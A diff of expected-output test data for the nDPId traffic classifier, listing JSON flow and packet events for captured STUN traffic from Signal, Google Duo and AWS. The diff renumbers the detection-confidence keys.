00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1636901956921,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901956921,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwevJAAEARy\/zAqAyprP15f5wOS2YAHEUhAAEAACESpEJOVFU1cXVJU2dZVFA="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956929,"flow_last_seen":1636901956929,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956929,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1636901956929,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901956929,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnuJAAEAR80PAqAypI563p5wOAbsAHAwRAAEAACESpEJneHI1SHRPK0tqKzc="} -00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956929,"flow_last_seen":1636901956929,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956929,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956929,"flow_last_seen":1636901956929,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956929,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956930,"flow_last_seen":1636901956930,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956930,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1636901956930,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901956930,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnuNAAEAR80LAqAypI563p5wODZYAHNwWAAEAACESpEI1alVGbDBvdmFLRGs="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956930,"flow_last_seen":1636901956930,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956930,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956930,"flow_last_seen":1636901956930,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956930,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1636901956946,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1636901956946,"pkt":"mt9Y+uvcCL6sCxduCABFAABwP65AAOQRrjcjnrenwKgMqQ2WnA4AXORTAQEAQCESpEI1alVGbDBvdmFLRGsAIAAIAAEPlXw9RVEAAQAIAAEuh10v4ROAKwAIAAENliOet6eALAAIAAEAUCOet6eAIgAETm9uZYAoAAT10UAM"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1636901956960,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1636901956960,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4nuZAAEAR8zfAqAypI563p6g8AbsAJMHVAAMACCESpEJwYTVMazRiQkhvWTEAGQAEEQAAAA=="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1636901956962,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1636901956962,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4nudAAEAR8zbAqAypI563p5wODZYAJOqGAAMACCESpEJuWjVNSmNUejZrc3YAGQAEEQAAAA=="} @@ -66,15 +66,15 @@ 00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1636901958294,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1636901958294,"pkt":"CL6sCxdumt9Y+uvcCABFAAB8azVAAEARa5jAqAypEsODj6g87uQAaP5FAAEATCESpEJyRHdyaGtEci8vOWUABgAJV0pzdTptTndxAAAAwFcABAADAAqAKgAIbYcgPZwg8UAAJAAEbn8e\/wAIABR\/b\/AcoEEqLjwzw3SbmvWontQU34AoAARPt0SR"} 00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1636901958378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1636901958378,"pkt":"mt9Y+uvcCL6sCxduCABFSABcrnFAAAMRZTQSw4OPwKgMqe7kqDwASOO3AQEALCESpEJyRHdyaGtEci8vOWUAIAAIAAEPmHw9RVEACAAUZTe+q2TI1x26\/6LLBdUUDVZaZoOAKAAEsQfEQQ=="} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1636901958378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1636901958378,"pkt":"mt9Y+uvcCL6sCxduCABFSAB8rnJAAAMRZRMSw4OPwKgMqe7kqDwAaODiAAEATCESpEJ2dFg5dWZIQUdCakMABgAJbU53cTpXSnN1AAAAwFcABAADA4SAKQAIQYCdgvFBqWUAJAAEbn8g\/wAIABSzQMYtF7YKfV2BCR2ZgRKFjKrZ7YAoAASRLc2k"} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901958294,"flow_last_seen":1636901958378,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1636901958378,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":43068,"dst_port":61156,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1636901956900,"flow_last_seen":1636901967279,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636901967279,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":43068,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1636901956921,"flow_last_seen":1636901967684,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1636901967684,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39950,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901958294,"flow_last_seen":1636901958378,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1636901958378,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":43068,"dst_port":61156,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1636901956900,"flow_last_seen":1636901967279,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636901967279,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":43068,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1636901956921,"flow_last_seen":1636901967684,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1636901967684,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39950,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998588,"flow_last_seen":1636901998588,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901998588,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47767,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1636901998588,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901998588,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwgdlAAEARxRXAqAyprP15f7qXS2YAHLUpAAEAACESpEJFRDdhYWpCejZ6NGY="} -00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":289,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998588,"flow_last_seen":1636901998588,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901998588,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47767,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} +00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":289,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998588,"flow_last_seen":1636901998588,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901998588,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47767,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":290,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998589,"flow_last_seen":1636901998589,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901998589,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":37970,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1636901998589,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901998589,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwgdpAAEARxRTAqAyprP15f5RSS2YAHI3jAAEAACESpEJHZko4WW5Ca1ZEVTk="} -00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":290,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998589,"flow_last_seen":1636901998589,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901998589,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":37970,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} +00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":290,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998589,"flow_last_seen":1636901998589,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901998589,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":37970,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998637,"flow_last_seen":1636901998637,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901998637,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1636901998637,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901998637,"pkt":"CL6sCxdumt9Y+uvcCABFAAAw3EdAAEAR8rLAqAypI55607qXAbsAHB+DAAEAACESpEJDTUpIUUxOenE3VDQ="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998637,"flow_last_seen":1636901998637,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901998637,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -88,56 +88,56 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1636901998654,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1636901998654,"pkt":"CL6sCxdumt9Y+uvcCABFAAA43E1AAEAR8qTAqAypI55605RSDZYAJBd3AAMACCESpEJOTG9MWFNjWDdLU3cAGQAEEQAAAA=="} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998654,"flow_last_seen":1636901998654,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1636901998654,"l3_proto":"ip4","src_ip":"35.158.122.211","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1636901998654,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1636901998654,"pkt":"mt9Y+uvcCL6sCxduCABFAABMVVMAAOMBFpsjnnrTwKgMqQMDaO0AAAAARQAAMNxHQAAgERKzwKgMqSOeetO6lwG7ABwfgwABAAAhEqRCQ01KSFFMTnpxN1Q0"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998654,"flow_last_seen":1636901998654,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1636901998654,"l3_proto":"ip4","src_ip":"35.158.122.211","dst_ip":"192.168.12.169","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.050556} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998654,"flow_last_seen":1636901998654,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1636901998654,"l3_proto":"ip4","src_ip":"35.158.122.211","dst_ip":"192.168.12.169","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.050556} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1636901998654,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1636901998654,"pkt":"mt9Y+uvcCL6sCxduCABFAABMVVQAAOMBFpojnnrTwKgMqQMDaO0AAAAARQAAMNxIQAAgERKywKgMqSOeetOUUgG7ABwljAABAAAhEqRCVjVicmFhSFdCOW5q"} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1636901998657,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1636901998657,"pkt":"mt9Y+uvcCL6sCxduCABFAABUVVUAAOMBFpEjnnrTwKgMqQMDaPUAAAAARQAAONxJQAAgERKpwKgMqSOeetO6lwG7ACSHhgADAAghEqRCdG90WXN0M3RzbnZtABkABBEAAAA="} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1636901998660,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1636901998660,"pkt":"mt9Y+uvcCL6sCxduCABFIAB49klAAOMRNUgjnnrTwKgMqQ2WupcAZEK5ARMASCESpEJRck1mY3NySEUrbG4ACQAQAAAEAVVuYXV0aG9yaXplZAAVABA0YTlmNTljZmZlODk0NGE5ABQACnNpZ25hbC5vcmcAAIAiAAROb25lgCgABLOFpWg="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901998644,"flow_last_seen":1636901998660,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1636901998660,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901998644,"flow_last_seen":1636901998660,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1636901998660,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 